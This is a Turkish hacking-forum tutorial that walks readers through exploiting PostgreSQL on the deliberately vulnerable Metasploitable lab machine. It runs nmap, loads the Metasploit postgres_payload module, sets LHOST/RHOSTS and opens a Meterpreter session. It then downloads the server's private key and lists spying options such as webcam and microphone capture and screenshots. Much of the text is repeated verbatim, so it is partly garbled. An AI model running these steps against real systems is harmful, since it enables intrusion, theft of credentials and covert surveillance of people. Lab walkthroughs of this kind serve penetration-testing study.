Merhaba değerli Türk Hack Team üyeleri, bu konum bir önceki konumun devamı olmaktadır. Bu konumdan önce bir önceki konumu baştan sonra kadar okumanızı tavsiye ederim
Başlamadan Önce Eklemek İstediklerim;
Öncelikle bu konuya gelmeden önce diğer konuyu okuyun konunun linkini bırakıyorum. Eğer ki anlamadığınız bir nokta olursa bana imzamdaki adreslerden ulaşabilirsiniz. Forumda web sızma testlerinde sizleri geliştirmek ve görevlerimi yerine getirmek için bir seri başlattım. Bu konu ise bu serinin 2. konusu olacak. Ve de şu olay çok önemli bende makinemin teması terminal vs. bunlar farklı siz bunları aldırış etmeyin sizde farklı olabilir ama kodlar aynı olacaktır.
Neler Yapacağız Bu Konuda?
Bu konuda yine Met@sploitable içindeki bir açığı hackleyeceğiz. Bu açık:
- PosterSql
Açığıdır.
Aşamalarımız şu şekilde olacak;
- Nmap ile bir versiyon taraması
- Açığı Bulalım
- Açığı nasıl hackleriz birlikte bakalım
- Açığı Hackleyelim
- Hackledikten Sonra Beraber Gezinelim
Şeklinde aşamalarımız olacak o halde dilerseniz başlayalım.
Sanal makine virtual box u açın ve met@sploitable'ı başlatın arkadaşlar. Ve kullanıcı adı ve şifre olarak giriş yapın. Daha sonrasında saldırı yapacağımız makinenin bize IP si lazım. Bu ip ye
Kod:
ifconfig
Komutu ile bakabiliyoruz arkadaşlar. Kullanıcı adı ve şifre girdikten sonra ifconfig yazarak ip yi görüntülüyoruz.

Evet görüyoruz ki ip 192.168.1.18 olmakta. Şimdi ise aşamalara geçiş yapalım
Nmap İle Bir Versiyon Taraması
Bir önceki konumda da söylediğim gibi sitelerin portlarındaki versiyonlarda açıklar olabiliyor. İşte bizde bu açıkları sömürüp sistemi hackliyoruz aslında, tabi bu işlemleri kendimiz yasal ve etik bir ortam da işliyoruz.
Bir önceki konudan hatırlarsınız
Kod:
nmap -sV hedefip
E]
KOmutumuz bize açık portlar ile versiyon bilgilerini beraberinde veren nmap aracının Quick Scan Plus seçeneğidir. O halde taratalım makinemizi
Kod:
nmap -sV 192.168.1.18

Sonuçlar bu şekilde arkadaşlar.
Açık Bulalım
Şimdi arkadaşlar zaten met@sploitable bilerek açıklı bırakılmış bir sistem olduğu için intense scan yapmamıza gerek yok. Normalde nmap den en güzel tarama intense scandır. Çünkü hem açık portları verir hemde versiyonları verir hemde versiyonlar hakkında küçük bilgiler veriyor o küçük bilgiler aslında versiyonda bir açık var mı bunu da böyle gizlice belirtebiliyor aslında. Bizim şuanlık bunu yapmamıza gerek yok çünkü zaten bellidir burda açıklar. Örneğin şimdi burda PosterSql var;

Hani bu açıklıdır mesela şimdi bu açığı nasıl hackleriz birde gelin ona bakalım
Açığı nasıl hackleriz gelin birlikte buna bakalım
Şimdi arkadaşlar bu versiyon bilgisini önce bir seçip kopyalıyoruz. Daha sonra Fire fox u açıyoruz.
Arama olarak PostgreSQL DB 8.3.0 - 8.3.7 exploit
Şeklinde bir arama yapıyoruz.

Mesela burda güzel siteler var.
Bunlara bakabilir ve öğrenebilirsiniz ama ben size yine detaylı anlatacağım zaten.
Açığı Hackleyelim!
Şimdi geçen konudan biliyorsunuz ki met@sploit diye bir araç vardı bu araç ne yapıyordu kısaca sızma testlerinde kullanılan bir araçtı. Bu açığı da bu araç ile hackleyeceğiz beraber. Bu aracı nasıl bir komut ile başlatıyorduk?
Kod:
msfconsole
Yazdıktan sonra açılacaktır.

Gördüğünüz gibi burda met@sploit açıldı. Şimdi ise bize araştırdığımız sitelerde bir modul vermiş olması gerek bu modulu buraya yapıştırıp o module geçiş yapacağız.
[CODE]use exploit/linux/postgres/postgres_payload[/CODE]
Modulumuz bu

Gördüğünüz gibi şuanda module geçiş yaptık. Sonrasında bazı gerekli ayarları görmek ve bunları değiştirmek lazımdı. Ne yapıyorduk?
Kod:
show options
yapınca bize bir takım ayarlar verecek.

Bakın bu sefer geçen konuda olmayan bir şey var LHOST da gerekli kendi local ip miz yani. Eğer parrot u benim dediğim gibi kurdu iseniz yeni bir terminal açıp ifconfig yazdığınızda:
Burda görünecektir
NOT: Eğer bir hata alırsanız root değilsinizdir bunun için
sudo su
...........: root şifreniz olarak roota geçiş yapabilirsiniz
anlamadığınız yerler için videolu anlatım yapıcam yarın ekleyeceğim eğer orda da anlamaziseniz sorabilirsiniz.

İp mizi öğrendik. Bu terminali kapatalım ve msf in olduğu yere geçelim. Bir ayarı değişmek için şöyle bir komutumuz vardı
Kod:
set LHOST localip
şeklinde
Kod:
set LHOST 192.168.1.11

show options da yaptığımızda görüyoruz ki ayar değişti.

Gerçi bende değişmedi ama sizde değişecektir sizde LHOST kısmı boş iken girdiğiniz ip gelecektir.
Burda vermemiş ama her zaman hedef sistemin ip sine ihtiyacımız vardır arkadaşlar
Kod:
set RHOSTS hedefip
Kod:
set RHOSTS 192.168.1.18
yapıyoruz ve hedef ip de belirlendi.
Artık hackleyebiliriz.
Kod:
exploit
diyoruz.
Başlamadan Önce Eklemek İstediklerim;
Öncelikle bu konuya gelmeden önce diğer konuyu okuyun konunun linkini bırakıyorum. Eğer ki anlamadığınız bir nokta olursa bana imzamdaki adreslerden ulaşabilirsiniz. Forumda web sızma testlerinde sizleri geliştirmek ve görevlerimi yerine getirmek için bir seri başlattım. Bu konu ise bu serinin 2. konusu olacak. Ve de şu olay çok önemli bende makinemin teması terminal vs. bunlar farklı siz bunları aldırış etmeyin sizde farklı olabilir ama kodlar aynı olacaktır.
Neler Yapacağız Bu Konuda?
Bu konuda yine Met@sploitable içindeki bir açığı hackleyeceğiz. Bu açık:
- PosterSql
Açığıdır.
Aşamalarımız şu şekilde olacak;
- Nmap ile bir versiyon taraması
- Açığı Bulalım
- Açığı nasıl hackleriz birlikte bakalım
- Açığı Hackleyelim
- Hackledikten Sonra Beraber Gezinelim
Şeklinde aşamalarımız olacak o halde dilerseniz başlayalım.
Sanal makine virtual box u açın ve met@sploitable'ı başlatın arkadaşlar. Ve kullanıcı adı ve şifre olarak giriş yapın. Daha sonrasında saldırı yapacağımız makinenin bize IP si lazım. Bu ip ye
Kod:
ifconfig
Komutu ile bakabiliyoruz arkadaşlar. Kullanıcı adı ve şifre girdikten sonra ifconfig yazarak ip yi görüntülüyoruz.

Evet görüyoruz ki ip 192.168.1.18 olmakta. Şimdi ise aşamalara geçiş yapalım
Nmap İle Bir Versiyon Taraması
Bir önceki konumda da söylediğim gibi sitelerin portlarındaki versiyonlarda açıklar olabiliyor. İşte bizde bu açıkları sömürüp sistemi hackliyoruz aslında, tabi bu işlemleri kendimiz yasal ve etik bir ortam da işliyoruz.
Bir önceki konudan hatırlarsınız
Kod:
nmap -sV hedefip
E]
KOmutumuz bize açık portlar ile versiyon bilgilerini beraberinde veren nmap aracının Quick Scan Plus seçeneğidir. O halde taratalım makinemizi
Kod:
nmap -sV 192.168.1.18

Sonuçlar bu şekilde arkadaşlar.
Açık Bulalım
Şimdi arkadaşlar zaten met@sploitable bilerek açıklı bırakılmış bir sistem olduğu için intense scan yapmamıza gerek yok. Normalde nmap den en güzel tarama intense scandır. Çünkü hem açık portları verir hemde versiyonları verir hemde versiyonlar hakkında küçük bilgiler veriyor o küçük bilgiler aslında versiyonda bir açık var mı bunu da böyle gizlice belirtebiliyor aslında. Bizim şuanlık bunu yapmamıza gerek yok çünkü zaten bellidir burda açıklar. Örneğin şimdi burda PosterSql var;

Hani bu açıklıdır mesela şimdi bu açığı nasıl hackleriz birde gelin ona bakalım
Açığı nasıl hackleriz gelin birlikte buna bakalım
Şimdi arkadaşlar bu versiyon bilgisini önce bir seçip kopyalıyoruz. Daha sonra Fire fox u açıyoruz.
Arama olarak PostgreSQL DB 8.3.0 - 8.3.7 exploit
Şeklinde bir arama yapıyoruz.

Mesela burda güzel siteler var.
Bunlara bakabilir ve öğrenebilirsiniz ama ben size yine detaylı anlatacağım zaten.
Açığı Hackleyelim!
Şimdi geçen konudan biliyorsunuz ki met@sploit diye bir araç vardı bu araç ne yapıyordu kısaca sızma testlerinde kullanılan bir araçtı. Bu açığı da bu araç ile hackleyeceğiz beraber. Bu aracı nasıl bir komut ile başlatıyorduk?
Kod:
msfconsole
Yazdıktan sonra açılacaktır.

Gördüğünüz gibi burda met@sploit açıldı. Şimdi ise bize araştırdığımız sitelerde bir modul vermiş olması gerek bu modulu buraya yapıştırıp o module geçiş yapacağız.
[CODE]use exploit/linux/postgres/postgres_payload[/CODE]
Modulumuz bu

Gördüğünüz gibi şuanda module geçiş yaptık. Sonrasında bazı gerekli ayarları görmek ve bunları değiştirmek lazımdı. Ne yapıyorduk?
Kod:
show options
yapınca bize bir takım ayarlar verecek.

Bakın bu sefer geçen konuda olmayan bir şey var LHOST da gerekli kendi local ip miz yani. Eğer parrot u benim dediğim gibi kurdu iseniz yeni bir terminal açıp ifconfig yazdığınızda:
Burda görünecektir
NOT: Eğer bir hata alırsanız root değilsinizdir bunun için
sudo su
...........: root şifreniz olarak roota geçiş yapabilirsiniz
anlamadığınız yerler için videolu anlatım yapıcam yarın ekleyeceğim eğer orda da anlamaziseniz sorabilirsiniz.

İp mizi öğrendik. Bu terminali kapatalım ve msf in olduğu yere geçelim. Bir ayarı değişmek için şöyle bir komutumuz vardı
Kod:
set LHOST localip
şeklinde
Kod:
set LHOST 192.168.1.11

show options da yaptığımızda görüyoruz ki ayar değişti.

Gerçi bende değişmedi ama sizde değişecektir sizde LHOST kısmı boş iken girdiğiniz ip gelecektir.
Burda vermemiş ama her zaman hedef sistemin ip sine ihtiyacımız vardır arkadaşlar
Kod:
set RHOSTS hedefip
Kod:
set RHOSTS 192.168.1.18
yapıyoruz ve hedef ip de belirlendi.
Artık hackleyebiliriz.
Kod:
exploit
diyoruz.

Evet meterpreter çıktı yani artık hacklediniz. Meterpreter adlı session un olduğu açıklar her zaman daha hoş işlemleri yapabileceğimiz açıklardır örnek ne yapabiliriz.
Bi help komutu çalıştıralım



Bakın burda kısa bir şekilde ingilizce olarak neler yapabileceğimizi bize gösteriyor. Webcam bile açabiliyormuşuz tabi bunu yaparken hedef sistemde malum webcam yok :D bu yüzden çalışmaz ama örneğin;




Mesela buralarda gördüğünüz gibi önce pwd ile nerde olduğuma baktım sonra ls dedim ve içinde çeşitli dosyalar buldum bunlardan server.key önemli gibi geldi gözüme bunun için download server.key komutu ile server.key dosyasının kopyasını karşıdan kendi bilgisayarıma aldım.
Daha da;
cd .. komutları ile geri geri gidip / dizinine geldikten sonra sistemi iyice araştırabilirsiniz.
Yapabilecekleriniz;
-Webcam den bir fotoğraf alabilir
-Önemli belgeler görüntüleyebilir
-Webcam anlık takip edilebilir
-bir saniyelik ses kaydı alınabilir
-ses anlık takip edilebilir
-ekran fotoğrafı alınabilir
-bir dosya oluşturulabilir veya silinebilir
-bir şeyi açabilir
Gibi popüler şeyler var bunlara bakabilirsiniz komutları deneyin ne işe yaradıklarını görün. Hatta ingilizce yerleri çevirin zaten açıklıyor size orda :)
Bu konumda bu kadardı umarım yararlı olmuştur iyi forumlar dilerim :)